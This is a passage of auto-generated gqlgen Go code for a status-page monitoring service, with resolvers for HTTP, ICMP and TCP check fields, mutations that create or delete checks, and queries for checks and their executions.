return obj.Identifier, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_frecuency(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Frecuency, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_url(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.URL, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_status(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_latestCheck(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.LatestCheck, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*time.Time)
fc.Result = res
return ec.marshalOTime2ᚖtimeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_message(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _HttpCheck_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.HTTPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "HttpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_id(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_identifier(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Identifier, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_frecuency(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Frecuency, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_address(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Address, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_status(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_latestCheck(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.LatestCheck, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*time.Time)
fc.Result = res
return ec.marshalOTime2ᚖtimeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_message(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _IcmpCheck_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.IcmpCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "IcmpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ErrorMsg, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_poll(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().Poll(rctx)
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*models.PollResult)
fc.Result = res
return ec.marshalOPollResult2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐPollResult(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_createHttpCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_createHttpCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().CreateHTTPCheck(rctx, args["input"].(models.CreateHTTPCheckInput))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(models.Check)
fc.Result = res
return ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_createTcpCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_createTcpCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().CreateTCPCheck(rctx, args["input"].(models.CreateTCPCheckInput))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(models.Check)
fc.Result = res
return ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_createTlsCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_createTlsCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().CreateTLSCheck(rctx, args["input"].(models.CreateTLSCheckInput))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(models.Check)
fc.Result = res
return ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_createIcmpCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_createIcmpCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().CreateIcmpCheck(rctx, args["input"].(models.CreateIcmpCheckInput))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(models.Check)
fc.Result = res
return ec.marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx, field.Selections, res)
}
func (ec *executionContext) _Mutation_deleteCheck(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Mutation",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Mutation_deleteCheck_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Mutation().DeleteCheck(rctx, args["id"].(string))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(*models.DeleteResponse)
fc.Result = res
return ec.marshalNDeleteResponse2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐDeleteResponse(ctx, field.Selections, res)
}
func (ec *executionContext) _PollResult_took(ctx context.Context, field graphql.CollectedField, obj *models.PollResult) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "PollResult",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Took, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(int)
fc.Result = res
return ec.marshalNInt2int(ctx, field.Selections, res)
}
func (ec *executionContext) _Query_checks(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Query",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Query().Checks(rctx)
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]models.Check)
fc.Result = res
return ec.marshalOCheck2ᚕgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) _Query_executions(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Query",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: true,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Query_executions_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.resolvers.Query().Executions(rctx, args["checkId"].(string), args["from"].(*time.Time), args["until"].(*time.Time))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]*models.CheckExecution)
fc.Result = res
return ec.marshalOCheckExecution2ᚕᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckExecutionᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) _Query___type(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Query",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field_Query___type_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.introspectType(args["name"].(string))
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
func (ec *executionContext) _Query___schema(ctx context.Context, field graphql.CollectedField) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "Query",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return ec.introspectSchema()
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Schema)
fc.Result = res
return ec.marshalO__Schema2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐSchema(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_id(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.ID, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNID2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_identifier(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Identifier, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_frecuency(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Frecuency, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_address(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Address, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_status(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Status, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_latestCheck(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.LatestCheck, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*time.Time)
fc.Result = res
return ec.marshalOTime2ᚖtimeᚐTime(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_message(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "TcpCheck",
Field: field,
Args: nil,
IsMethod: false,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Message, nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
if !graphql.HasFieldError(ctx, fc) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
res := resTmp.(string)
fc.Result = res
return ec.marshalNString2string(ctx, field.Selections, res)
}
func (ec *executionContext) _TcpCheck_errorMsg(ctx context.Context, field graphql.CollectedField, obj *models.TCPCheck) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
